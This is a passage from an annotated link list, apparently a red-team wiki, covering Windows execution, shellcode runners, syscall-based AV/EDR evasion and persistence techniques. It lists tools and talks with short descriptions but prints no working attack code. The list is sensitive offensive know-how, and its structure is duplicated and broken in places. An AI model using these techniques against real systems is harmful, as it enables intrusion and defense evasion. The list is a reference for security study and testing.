#LOLBins - Nothing to LOL about! - Oddvar Moe(Derbycon2018)
- You have probably heard the term LOLBin, LOLScript or LOLLib by now. Want to get more insights on that? Then this is the talk you want to attend.This talk will cover the Living Off The Land Binaries and Scripts (LOLBAS) project, what the project is, how it became and how you can help this evolve into the future. The talk will also go over some of my favorite LOLBins that has came to light due to this project (at least that's what I like to think) and show you some cool stuff! I mean, everybody loves to see binaries misbehave.
-
Covert Attack Mystery Box: A few novel techniques for exploiting Microsoft "features" - Mike Felch and Beau Bullock (WWHF2018)
- Over the last few months we’ve been doing a bit of research around various Microsoft “features”, and have mined a few interesting nuggets that you might find useful if you’re trying to be covert on your red team engagements. This talk will be “mystery surprise box” style as we’ll be weaponizing some things for the first time. There will be demos and new tools presented during the talk. So, if you want to win at hide-n-seek with the blue team, come get your covert attack mystery box!
-
Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation - Christopher Campbell, Matthew Graeber(Derybcon2013)
-
In-the-Spirit-Of
-
BADministration
- BADministration is a tool which interfaces with management or administration applications from an offensive standpoint. It attempts to provide offsec personnel a tool with the ability to identify and leverage these non-technical vulnerabilities. As always: use for good, promote security, and fight application propagation.
-
BADministration
- Not really
-
101
-
Bring-Your-Own-Land
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
BYOI (Bring Your Own Interpreter) payloads - Marcello Salvati(RomHack2020)
- Slides
- Offensive PowerShell tradecraft is in “Zombie Mode”: it’s sort of dead, but not entirely. With all of the defenses Microsoft has implemented in the PowerShell runtime over the past few years Red Teamers / Pentesters & APT groups have started too shy away from using PowerShell based payloads/delivery mechanisms and migrate over to C#. However, C# is a compiled language. Operationally this has a few major downsides: we can’t be as “flexible” as setting up a proper development environment has an overhead and can be time consuming and you have to compile all the things all the time etc.
-
BYOI (Bring Your Own Interpreter) payloads - Marcello Salvati(RomHack2020)
- Bring-Your-Own-Driver
-
Execution
-
Articles/Blogposts/Writeups
-
CodeExecutionOnWindows
- A list of ways to execute code, including examples, are shown below. Note that UAC bypasses and DLL hijacking will not be included as these are covered elsewhere.
-
CodeExecutionOnWindows
-
LoLBins
- Certreq.exe
- Nuget/Squirrel/Electron
- Microsoft.Workflow.Compiler.exe
-
MSBuild
-
101
- MSBuild - docs.ms
- MSBuild Inline Tasks - docs.ms
- Understanding the Project File(MSBuild) - docs.ms
-
Understanding the project file - docs.ms
- Microsoft Build Engine (MSBuild) project files lie at the heart of the build and deployment process. This topic starts with a conceptual overview of MSBuild and the project file. It describes the key components you'll come across when you work with project files, and it works through an example of how you can use project files to deploy real-world applications.
-
Articles/Blogposts/Writeups
- MSBuild: A Profitable Sidekick! - Sarah Norris(2020)
-
MSBuild without MSBuild - pentestlaboratories(2020)
- [...]MSBuild is no longer required to execute code since it is possible to use a .NET assembly that will call the malicious .csproj from a remote location (UNC path). This technique doesn’t leave any artifacts since it doesn’t touch the disk and the code is injected into a legitimate Windows process Internet Explorer.
- Doing More With MSBuild - 3gstudent
-
Remotely Host MSBuild Payloads - Joe Leon(2020)
- tl;dr Separate your C# payload from a MSBuild XML file and host it remotely on a WebDav server.
-
Another MSBuild Invocation (February 2020 Edition) - Joe Leon(2020)
- TL;DR: Use MSBuild’s UnregisterAssembly task to execute arbitrary code in a .NET assembly.
-
Tools
-
MSBuildAPICaller
- MSBuild Without MSBuild.exe
-
NoMSBuild
- MSBuild without MSbuild.exe
-
MSBuildAPICaller
-
101
-
MSI
- Windows Installer - docs.ms
- Windows Installer - Wikipedia
-
The Return of Raining SYSTEM Shells with Citrix Workspace app -
- Back in July I documented a new Citrix Workspace vulnerability that allowed attackers to remotely execute arbitrary commands under the SYSTEM account. Well after some further investigation on the initial fix I discovered a new vector that quite frankly should not exist at all since the previous reported vulnerability. The core of the issue lies with a remote command line injection vulnerability that allows attackers to bypass Citrix signed MSI installers using a malicious MSI transform.
-
PwnyForm
- PwnyForm will take an MSI installer as input and generate an MSI transform (mst) that can be used to inject arbitrary command execution by adding a custom action that will execute during the UI or Install sequence of an MSI file. The generated MST produces a JScript custom action that will by default launch cmd.exe, the executed command can be overriden using the CMD MSI property
-
MSHTA
- Internet Explorer MSHTA Security Threat - Dennis Faas(2003)
- The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware - Andy Green(2020)
- MSHTA code execution - bypass application whitelisting. - @spottheplanet
- Bypass Application Whitelisting using mshta.exe (Multiple Methods) - Raj Chandel
- w.e w.e Internet Explorer Does What It Wants - Aaron Heikkila(GrrCON2018)
-
MS Office
- Excel
-
Tools
-
Hello World XLL
- This is a simple XLL, showing how to create an XLL from scratch.
-
xllpoc
- A small project that aggregates community knowledge for Excel XLL execution, via xlAutoOpen() or PROCESS_ATTACH.
-
Hello World XLL
- MS Teams
- Windows Update Client(wuauclt)
- 3rd-Party LoLbins
-
Command and Scripting Interpreter
-
Cmd.exe
- Articles/Blogposts/Writeups
-
CMD Arg Spoofing
- Articles/Blogposts/Writeups
- Tools
-
Obfuscation
-
Articles/Blogposts/Writeups
- DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques - Daniel Bohannon(2018)
- Cmd Hijack - a command/argument confusion with path traversal in cmd.exe - Julian Horoszkiewicz(2020)
- Hiding process creation and cmd line with a long com… - Hexacorn(2020)
- Tried and True Hacker Technique: DOS Obfuscation - John Hammond(2020)
-
Tools
-
Invoke-DOSfuscation
- Cmd.exe Command Obfuscation Generator & Detection Test Harness
-
Invoke-DOSfuscation
-
Articles/Blogposts/Writeups
- PPID Spoofing
-
.NET
-
Articles/Blogposts/Writeups
-
Running a .NET Assembly in Memory with Meterpreter - Thomas Hendrickson(2019)
- In this blog post I will discuss leveraging Meterpreter’s powershell module to execute .NET assemblies in-memory.
-
Running a .NET Assembly in Memory with Meterpreter - Thomas Hendrickson(2019)
-
Articles/Blogposts/Writeups
-
WebAssembly
- Articles/Blogposts/Writeups
-
Tools
-
WASSUP-WASM
- "WASSUP-WASM" is a tiny application that can be used to download and execute the WebAssembly binary using Node.JS.
-
WASSUP-WASM
-
XSL Script Processing
- Articles/Blogposts/Writeups
- Tools
-
Cmd.exe
-
Compiled HTML Files
- 101
-
Articles/Blogposts/Writeups
- CHM Badness Delivers a Banking Trojan - Rodel Mendrez(2017)
- Malicious CHM Files Being Used to Install Brazilian Banking Trojans - Lawrence Abrams(2017)
-
PuTTY vulnerability vuln-chm-hijack - chiark.greenend.org(2019)
- Potential malicious code execution via CHM hijacking
- What the Shell? New Security Breach Uses CHM Files to Cover Banking Trojans - Douglas Bonderud(2017)
-
Tools
-
Malicious-CHM-Guide.md - mgeeky
- CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).
-
PuTTY vulnerability vuln-chm-hijack
- Potential malicious code execution via CHM hijacking (CVE-2019-9896)
- Out-CHM.ps1
-
Malicious-CHM-Guide.md - mgeeky
-
Component-Object-Model
-
101
- See (D)COM
- Articles/Blogposts/Writeups
-
101
-
ControlPanel Items
- 101
-
Articles/Blogposts/Writeups
- Starting a Dynamic-link Library as a Control Panel File(Vault7)
- FalconFriday — Process injection and malicious CPL files — 0xFF03 - Henri Hambartsumyan(2020)
- Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spottheplanet
- Code Execution through Control Panel Add-ins - @spottheplanet
-
Tools
-
CPLResourceRunner
- Run shellcode from resource
-
CPLResourceRunner
-
DLL-Related
-
101
-
DLLsForHackers
- Dlls that can be used for side loading and other attack vectors. This Dll will not cause deadlock since it only use functions that are DllMain safe as described below.
-
DLLsForHackers
-
DLL Injection
- See DLL Injection
-
Hijacking
- Articles/Blogposts/Writeups
- Tools
- Proxying * DLL Import Redirection in Windows 10 1909 - James Forshaw(2020)
-
101
- Downloaders
-
Exploitation for Client Execution
-
Articles/Blogposts/Writeups
-
CVE-2019-0726 - MWRLabs
- DHCP client rce
-
Analysis of CVE-2020-0605 – Code Execution using XPS Files in .NET - MDSec(2020)
- Microsoft patched a number of deserialisation issues using the XPS files. Although the patch for CVE-2020-0605 was released in January 2020, it was incomplete and an additional update was released in May 2020. The patched issue could be useful to exploit any code that deals with the XPS file using .NET libraries. The identified issues could also be helpful as bridged gadgets when exploiting XAML deserialisation related issue.
-
CVE-2019-0726 - MWRLabs
-
Articles/Blogposts/Writeups
- Indirect Execution
-
Inter-Process Communication
-
Component Object Model and Distributed COM
- Articles/Blogposts/Writeups
- Tools
-
DDE
- See Phishing.md
- Articles/Blogposts/Writeups
- Tools
-
Component Object Model and Distributed COM
-
Scripting Host
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Establishing A Foothold With JavaScript - Casey Smith(Derbycon2016)
- Yes, you read that right. JavaScript is everywhere, and is often overlooked. This talk will briefly outline some tactics you can use to establish a foothold and persist in an Enterprise network using only JavaScript. I will demonstrate some fileless persistence mechanisms.
-
Establishing A Foothold With JavaScript - Casey Smith(Derbycon2016)
-
Native API(Syscalls & WinAPI)
-
101
- Windows API - Wikipedia
-
Windows API index - docs.ms
- The following is a list of the reference content for the Windows application programming interface (API) for desktop and server applications. Using the Windows API, you can develop applications that run successfully on all versions of Windows while taking advantage of the features and capabilities unique to each version. (Note that this was formerly called the Win32 API. The name Windows API more accurately reflects its roots in 16-bit Windows and its support on 64-bit Windows.)
- System calls: What are system calls and why are they necessary? -
- System Calls - docs.ms
- How Do Windows NT System Calls REALLY Work? - John Gulbrandsen
- Windows X86-64 System Call Table (XP/2003/Vista/2008/7/2012/8/10) - Mateusz "j00ru" Jurczyk
- FreshyCalls: Syscalls Freshly Squeezed! - ElephantSe4l(2020)
- Syscalls with D/Invoke - RastaMouse2021
- Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams - @modexpblog(2020)
- Learning
-
Articles/Blogposts/Writeups
- Struggling between syscall or sysenter (Windows) - StackOverflow
- Intercepting System Calls on x86_64 Windows - Jurriaan Bremer(2012)
- On Windows Syscall Mechanism and Syscall Numbers Extraction Methods - Simone Margaritelli(2014)
- Accessing the Windows API Directly - Osanda Malith(2015
- WinAPI Documentation - Steve Donovan
- Making Raw Syscalls on Windows From Python - Spencer(2017)
- Win32k System Call Filtering Deep Dive - Morten Schenk(2017)
- The Windows 10 TH2 INT 2E mystery - Adrien Chevalier(2018)
- Malware Mitigation when Direct System Calls are Used - Hod Gavriel(2018)
- SharedUserData SystemCall Hook - uninformed Vol.3
- Malware Mitigation when Direct System Calls are Used - Hod Gavriel(2018)
-
Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR - Cornelis de Plaa(2019)
- In this blog post we will explore the use of direct system calls, restore hooked API calls and ultimately combine this with a shellcode injection technique called sRDI. We will combine these techniques in proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, while not touching disk and evading AV/EDR monitored user-mode API calls.
- Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs - @spottheplanet
- Retrieving ntdll Syscall Stubs from Disk at Run-time - @spottheplanet
- System calls on Windows x64 - n4r1b(2019)
- Using Syscalls to Inject Shellcode on Windows - Solomon Sklash(2020)
- Undocumented Windows API Functions & Structures - Rake
- Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge - Jack Halon
- Red Team Tactics: Utilizing Syscalls in C# - Writing The Code - Jack Halon
- Tutorial Understanding Windows SysCalls - SysCall Dumper - Timb3r
- Fuzzing the Windows API for AV Evasion - Winternl(2020)
-
Talks/Presentations/Videos
-
Getting Windows to Play with Itself: A Pen Testers Guide to Windows API Abuse - Brady Bloxham(Derbycon2014)
- Windows APIs are often a blackbox with poor documentation, taking input and spewing output with little visibility on what actually happens in the background. By reverse engineering (and abusing) some of these seemingly benign APIs, we can effectively manipulate Windows into performing stealthy custom attacks using previously unknown persistent and injection techniques. In this talk, we’ll get Windows to play with itself nonstop while revealing 0day persistence, previously unknown DLL injection techniques, and Windows API tips and tricks. To top it all off, a custom HTTP beaconing backdoor will be released leveraging the newly released persistence and injection techniques. So much Windows abuse, so little time.
-
Getting Windows to Play with Itself: A Pen Testers Guide to Windows API Abuse - Brady Bloxham(Derbycon2014)
-
Tools
-
SysWhispers
- SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.
-
directInjectorPOC
- Small POC written in C# that performs shellcode injection on x64 processes using direct syscalls as a way to bypass user-land EDR hooks.
- hunter - fdiskyou
-
CallObfuscator
- Obfuscate specific windows apis with different apis
-
SyscallPOC
- A simple proof of concept shellcode injector using syscalls.
-
VBA-RunPE
- A VBA implementation of the RunPE technique or how to bypass application whitelisting.
- SharpSploit.Execution.DynamicInvoke
-
CallMon
- CallMon is an experimental system call monitoring tool that works on Windows 10 versions 2004+ using PsAltSystemCallHandlers
-
Windows-API-Fuzzer
- Designed to learn OS specific anti-emulation patterns by fuzzing the Windows API.
-
WinAltSyscallHandler
- Some research on AltSystemCallHandlers functionality in Windows 10 20H1 18999
-
FreshyCalls PoC
- A simple dumper as FreshyCalls' PoC. That's what's trendy, isn't it?
¯\_(ツ)_/¯
- A simple dumper as FreshyCalls' PoC. That's what's trendy, isn't it?
-
SysWhispers
-
101
- Processes
-
Scheduled Task/Job
- AT
- Scheduled Task
-
Shared Modules
-
Tools
-
DueDLLigence
- Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.
-
DueDLLigence
-
Tools
-
Shellcode Execution, Injection & Runners
- 101
-
Learning Shellcoding
-
Win32
-
Articles/Blogposts/Writeups
- https://web.archive.org/web/20150522211938/http://expdev.byethost7.com/2015/05/22/shellcode/
- https://vividmachines.com/shellcode/shellcode.html
- Understanding Windows Shellcode - Skape(2003)
- Win32 Shellcode - Intro - bolo(2019)
- The Art of Win32 Shellcoding - AmrThabet(2012)
- Finding Kernel32 Base and Function Addresses in Shellcode - @spotheplanet
- Windows Shellcoding x86 – Hunting Kernel32.dll – Part 1 - paranoidninja(2018)
-
Talks/Presentations/Videos
-
POP POP RETN An Introduction to Writing Win32 Shellcode - Christopher Maddalena(Derbycon2017)
- Slides
- If you have ever worked with an exploit or Metasploit, you have probably used shellcode, but do you know how it is made? This talk has been designed to walk you through the ins and outs of basic shellcode, with a focus on Windows and the x86 architecture. There will be a review of the basic computer science behind shellcode, a look under the hood of msfvenom works and how you can recreate msfvenom’s shellcode in Assembly, and then a walkthrough and a demo of how you can create a custom connectback stager using Assembly.
-
POP POP RETN An Introduction to Writing Win32 Shellcode - Christopher Maddalena(Derbycon2017)
- Samples of
-
Articles/Blogposts/Writeups
-
x64
-
101
-
Windows x64 Shellcode - Topher Timzen(2014)
- I will go over the differences between 32 and 64 bit assembly that I have noticed and how to work with them as well as some of the structures windows uses that are useful to know about for shellcode in the 64bit environment. I will also introduce two tools that I have created in helping my exploit development process.
-
Windows x64 Shellcode - Topher Timzen(2014)
-
Learning
- https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/
- Samples of
-
101
-
Win32
-
Execution
-
101
-
A Beginner’s Guide to Windows Shellcode Execution Techniques - Carsten Sandker(2019)
- Code
- This blog post is aimed to cover basic techniques of how to execute shellcode within the memory space of a process.
-
A Beginner’s Guide to Windows Shellcode Execution Techniques - Carsten Sandker(2019)
-
Articles/Blogposts/Writeups
-
Abusing native Windows functions for shellcode execution - Jeff White(2017)
- "I've been doing a lot of analysis on malicious docs (maldocs) lately and, among a popular variant circulating right now, is a technique that I found particularly interesting. Effectively, it abuses native Windows function calls to transfer execution to shellcode that it loads into memory. I thought it was cool in this context, and not something that I was super familiar with, even though I've since learned it's a very old technique, so I set out to do some research in identifying additional functions that could be abused in a similar way and how to leverage them
- GOing 4 A Run - Leo Pitt(2020)
- A Fundamental Tool in the Toolkit: Evasive Shellcode Launchers – Part 1 - Nichoali Wang(2020)
- C_Shot - Just What The Doctor Ordered - redxorblue(2020)
- In-Memory shellcode decoding to evade AVs/EDRs - Askar(2020)
- Executing shellcode with Unsafe Native Methods in PowerShell - mez0(2020)
-
Abusing native Windows functions for shellcode execution - Jeff White(2017)
-
101
-
Injection
- 101
- Articles/Blogposts/Writeups
-
Tools
-
shellcode-process-injection
- Simple C implementation to perform shellcode process injection via win32 APIs
- fido
-
shellcode-process-injection
-
Tools
- Generators
-
Venom
- The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( C# | python | ruby | dll | msi | hta-psh | docm | apk | macho | elf | deb | mp4 | etc ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to recive the remote connection (shell or meterpreter session). 'venom generator' reproduces some of the technics used by Veil-Evasion.py, unicorn.py, powersploit.py, etc..
-
Repo
-
go-shellcode(Ne0nd0g)
- A repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques.
-
go-shellcode(Ne0nd0g)
-
Runners
-
C_Shot
- C_Shot is an offensive security tool written in C which is designed to download, inject, and execute shellcode in memory.
-
go-shellcode
- This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection.
-
Go4aRun
- Shellcode runner in GO that incorporates shellcode encryption, remote process injection, block dlls, and spoofed parent process
-
UrbanBishopLocal
- A port of FuzzySecurity's UrbanBishop project for inline shellcode execution
-
DueDLLigence
- Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.
-
ShellcodeCompiler
- Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows (x86 and x64) and Linux (x86 and x64). It is possible to call any Windows API function or Linux syscall in a user-friendly way.
- Crab-Runner
-
C_Shot
-
Utilities
-
pe_to_shellcode
- Converts PE so that it can be then injected just like a normal shellcode. (At the same time, the output file remains to be a valid PE). Supports both 32 and 64 bit PEs Authors: @hasherezade & @hh86
-
Shellcoding(Mr-Un1k0d3r)
- Shellcoding Utilities and shellcode obfuscator generator.
-
ShellcodeWrapper
- Shellcode wrapper with encryption for multiple target languages
-
pe_to_shellcode
- Software Deployment Tools
-
System Services
-
Service Execution
- Articles/Blogposts/Writeups
-
Service Execution
-
Task Scheduler
-
101
- Windows Task Scheduler - Wikipedia
-
Task Scheduler for developers - docs.ms
- The Task Scheduler enables you to automatically perform routine tasks on a chosen computer. Task Scheduler does this by monitoring whatever criteria you choose (referred to as triggers) and then executing the tasks when those criteria are met.You can use the Task Scheduler to execute tasks such as starting an application, sending an email message, or showing a message box. Tasks can be scheduled to execute in response to these events, or triggers.
- Articles/Blogposts/Writeups
-
101
-
Third-Party Software
-
Articles/Blogposts/Writeups
-
Abusing Firefox in Enterprise Environments - Daniil Vylegzhanin(2020)
- In this blogpost, we will describe a technique that abuses legacy Firefox functionality to achieve command execution in enterprise environments. The security issue was that the compromised domain user had Full Control rights on the files stored in the GPO, which were then subsequently deployed by SCCM to the Mozilla Firefox installation folder for all computer objects within the OU where the GPO was applied.
-
Abusing Firefox in Enterprise Environments - Daniil Vylegzhanin(2020)
- Talks/Presentations/Videos
- Tools
-
Articles/Blogposts/Writeups
-
User Execution
-
Malicious Link
- Articles/Blogposts/Writeups
- Malicious File
-
Malicious Link
- VBScript
-
Windows Diagnostic Tools
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Using Windows diagnostics for system compromise - Nicholas Berthaume "aricon"(Derbycon2015)
- This talk will discuss the merits of using Microsoft diagnostic tools in order to deliver payloads to modern Microsoft operating systems with little or no scrutiny by anti-virus and network intrusion sensors.Ê In it I will go over the reasons for using this tool-set including the advantages of more conventional techniques as well as the reasoning behind its exploration vs. more invasive payloads including those reliant on bugs to provide system compromise.Ê Additionally a tool will be introduced that will provide for the creation of payloads on compatible
*nix
operating systems whereas previously they could only be generated using the Microsoft SDK on their operating systems.Ê Additionally there will be an element of privilege escalation by way of UAC bypass on default configurations of the windows operating system.
- This talk will discuss the merits of using Microsoft diagnostic tools in order to deliver payloads to modern Microsoft operating systems with little or no scrutiny by anti-virus and network intrusion sensors.Ê In it I will go over the reasons for using this tool-set including the advantages of more conventional techniques as well as the reasoning behind its exploration vs. more invasive payloads including those reliant on bugs to provide system compromise.Ê Additionally a tool will be introduced that will provide for the creation of payloads on compatible
-
Using Windows diagnostics for system compromise - Nicholas Berthaume "aricon"(Derbycon2015)
-
Windows Management Instrumentation
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Abusing Windows Management Instrumentation (WMI) - Matthew Graeber(BH USA 2015)
- Imagine a technology that is built into every Windows operating system going back to Windows 95, runs as System, executes arbitrary code, persists across reboots, and does not drop a single file to disk. Such a thing does exist and it's called Windows Management Instrumentation (WMI). With increased scrutiny from anti-virus and 'next-gen' host endpoints, advanced red teams and attackers already know that the introduction of binaries into a high-security environment is subject to increased scrutiny. WMI enables an attacker practicing a minimalist methodology to blend into their target environment without dropping a single utility to disk. WMI is also unlike other persistence techniques in that rather than executing a payload at a predetermined time, WMI conditionally executes code asynchronously in response to operating system events. This talk will introduce WMI and demonstrate its offensive uses. We will cover what WMI is, how attackers are currently using it in the wild, how to build a full-featured backdoor, and how to detect and prevent these attacks from occurring.
-
Abusing Windows Management Instrumentation (WMI) - Matthew Graeber(BH USA 2015)
- Tools
-
Windows Remote Management(WinRM)
-
Tools
-
CSharpWinRM
- CsharpWinRM is a .NET 4.0 implementation of WinRM using the WinRM C++ API. This project takes in credentials and a command, then executes it on the remote host using Win32_Process.
-
CSharpWinRM
-
Tools
-
Windows Trouble Shooting Packs
-
101
-
Windows Troubleshooting Platform - docs.ms
- Windows Troubleshooting Platform (WTP) provides ISVs, OEMs, and administrators the ability to write troubleshooting packs that are used to discover and resolve issues found on the computer. Previously, troubleshooting software and hardware issues was a manual process; however, using WTP you can automate the process of fixing the most common detectable issues that the user might encounter using your software or hardware.
-
Built-in Troubleshooting Packs - docs.ms
- Windows 7 includes built-in troubleshooting packs to deal with common problems such as problems that are related to printers, displays, sound, networking, system performance, and hardware compatibility. Microsoft designed these troubleshooting packs to correlate to the top ten categories of Microsoft support calls.
- Windows Update Troubleshooter for Windows 10
-
TroubleshootingPack(PowerShell) - docs.ms
- This reference provides cmdlet descriptions and syntax for all Troubleshooting Pack cmdlets. It lists the cmdlets in alphabetical order based on the verb at the beginning of the cmdlet.
-
Windows Troubleshooting Platform - docs.ms
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
101
-
Payloads
- Articles/Blogposts/Writeups
-
Papers
-
Post-Exploitation on Windows using ActiveX Controls
- When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS.
-
Post-Exploitation on Windows using ActiveX Controls
-
Tools
-
SirepRAT
- Remote Command Execution as SYSTEM on Windows IoT Core; The method is exploiting the Sirep Test Service that’s built in and running on the official images offered at Microsoft’s site. This service is the client part of the HLK setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol. We broke down the Sirep/WPCon protocol and demonstrated how this protocol exposes a remote command interface for attackers, that include RAT abilities such as get/put arbitrary files on arbitrary locations and obtain system information. Based on the findings we have extracted from this research about the service and protocol, we built a simple python tool that allows exploiting them using the different supported commands. We called it SirepRAT. It features an easy and intuitive user interface for sending commands to a Windows IoT Core target. It works on any cable-connected device running Windows IoT Core with an official Microsoft image.
- Whitepaper
- Slides
-
SirepRAT
-
Articles/Blogposts/Writeups
-
Persistence
- 101
- Tactics
-
Talks/Presentations/Videos
-
Evading Autoruns - Kyle Hanslovan, Chris Bisnet(Derbycon2017)
- When it comes to offense, maintaining access to your endpoints is key. For defenders, it's equally important to discover these footholds within your network. During this talk, Kyle and Chris will expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass will include a live demo and recommendations for detection.
- Materials
- Here to stay: Gaining persistency by Abusing Advanced Authentication Mechanisms - Marina Simakov, Igal Gofman
-
Evading Autoruns - Kyle Hanslovan, Chris Bisnet(Derbycon2017)
- Tools
-
Account Manipulation
- Additional Azure Service Principal Credentials
- Exchange Email Delegate Permissions
- Add Office 365 Global Administrator Role
-
RID Hijack
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
RID Hijacking: Maintaining Access on Windows Machines - Sebastián Castro(Derbycon2018)
- Slides
- The art of persistence is (and will be...) a matter of concern when successfully exploitation is achieved. Sometimes it is pretty tricky to maintain access on certain environments, especially when it is not possible to execute common vectors like creating or adding users to privileged groups, dumping credentials or hashes, deploying a persistent shell, or anything that could trigger an alert on the victim. This statement ratifies why it's necessary to use discrete and stealthy techniques to keep an open door right after obtaining a high privilege access on the target. What could be more convenient that only use OS resources in order to persist an access? This presentation will provide a new post-exploitation hook applicable to all Windows versions called RID Hijacking, which allows setting desired privileges to an existent account in a stealthy manner by modifying some security attributes. To show its effectiveness, the attack will be demonstrated by using a module which was recently added by Rapid7 to their Metasploit Framework, and developed by the security researcher Sebastián Castro.
-
RID Hijacking: Maintaining Access on Windows Machines - Sebastián Castro(Derbycon2018)
-
Tools
-
RID Hijacking: Maintaining Access on Windows Machines
- The RID Hijacking hook, applicable to all Windows versions, allows setting desired privileges to an existent account in a stealthy manner by modifying some security attributes of an user. By only using OS resources, it is possible to replace the RID of an user right before the primary access token is created, allowing to spoof the privileges of the hijacked RID owner.
-
RID Hijacking: Maintaining Access on Windows Machines
- SSH Authorized Keys
-
Active Directory Specific
-
Articles/Blogposts/Writeups
- Sneaky Active Directory Persistence Tricks - adsecurity.org
- Shadow Admins – The Stealthy Accounts That You Should Fear The Most - Asaf Hect
- Thousand ways to backdoor a Windows domain (forest)
-
Remote Hash Extraction On Demand Via Host Security Descriptor Modification - Will Harmjoy
- Tl;dr if you gain “administrative” access to a remote machine, you can modify a few host security descriptors and have a security principal/trustee of your choice generate Silver Tickets indefinitely, as well as remotely retrieve local hashes and domain cached credentials.
-
Talks/Presentations/Videos
-
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
- When a Windows domain is compromised, an attacker has several options to create backdoors, obscure his tracks, and make his access difficult to detect and remove. In this talk, I discuss ways that an attacker who has obtained domain administrator privileges can extend, persist, and maintain control, as well as how a forensic examiner or incident responder could detect these activities and root out an attacker.
-
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
- Tools
- Directory Services Restore Mode
-
Golden(Silver) Ticket
- Golden Ticket
- Kerberos Golden Tickets are Now More Golden
- Silver & Golden Tickets - hackndo
- [Mimikatz 2.0 - Golden Ticket Walkthrough - Ben Lincoln
https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
- Security Support Provider
- SeEnableDelegationPrivilege
- SID History
-
Articles/Blogposts/Writeups
-
Alternate Data Streams
-
Articles/Blogposts/Writeups
- Stealth Alternate Data Streams and Other ADS Weirdness - @mattifestation(2011)
- Putting data in Alternate data streams and how to execute it - oddvar.moe
- Kurt Seifried Security Advisory 003 (KSSA-003)
- NTFS Alternate Data Streams for pentesters (part 1)
- Using Alternate Data Streams to Persist on a Compromised Machine
- Using Alternate Data Streams to Persist on a Compromised Machine - enigma0x3
- NTFS Alternate Data Streams - darknessgate.com
- Talks & Presentations
-
Tools
-
Exe_ADS_Methods.txt - api0cradle
- Execute from Alternate Streams
-
Get-ADS
- Powershell script to search for alternate data streams
-
Evading Autoruns
- When it comes to offense, maintaining access to your endpoints is key. For defenders, it's equally important to discover these footholds within your network. During this talk, Kyle and Chris will expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass will include a live demo and recommendations for detection.
- Talk
-
Alternate-Data-Streams with PowerShell
- I literally stumbled upon this whilst reading up on the parameters for the Get-Content and Set-Content cmdlets for another piece of research. The parameter that got my interest is -Stream which allows the user the ability to read and write NTFS alternate data streams. If we create a file with the following commands:
$file = "$env:TEMP\test.txt" \ Set-Content -Path $file -Value 'Alternate Data Stream Test File'
. To read the file content, we use the following:Get-Content -Path $file
; Which will return:Alternate Data Stream Test File
- I literally stumbled upon this whilst reading up on the parameters for the Get-Content and Set-Content cmdlets for another piece of research. The parameter that got my interest is -Stream which allows the user the ability to read and write NTFS alternate data streams. If we create a file with the following commands:
-
Get-ADS
- Powershell script to search for alternate data streams This script searches recursively through a specified file system for alternate data streams (ADS). The script can search local and UNC paths speciffied by the $path paramenter. All readable files will have the stream attrubute inspected ignoring the default DATA and FAVICON (image file on URL files) streams. The script use Boe Prox's amazing Get-RunspaceData function and other code to multithread the search. The default number of threads is the number of logical cores plus one. This can be adjusted by specifiying the $threads parameter. Use with caution as runspaces can easily chomp resources (CPU and RAM). Once the number of file system objects (files and folders) is determined, they are split into equal groups of objects divided by the number of threads. Then each thread has a subset of the total objects to inspect for ADS.
-
Exe_ADS_Methods.txt - api0cradle
-
Articles/Blogposts/Writeups
- AMSI Provider
-
APPX/UWP
-
Persistence using Universal Windows Platform apps (APPX) - oddvarmoe
- Persistence can be achieved with Appx/UWP apps using the debugger options. This technique will not be visible by Autoruns.
-
Persistence using Universal Windows Platform apps (APPX) - oddvarmoe
-
BITS Jobs
-
Articles/Blogposts/Writeups
- Background Intelligent Transfer Service - docs.ms
-
BITSAdmin tool - docs.ms
- BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.
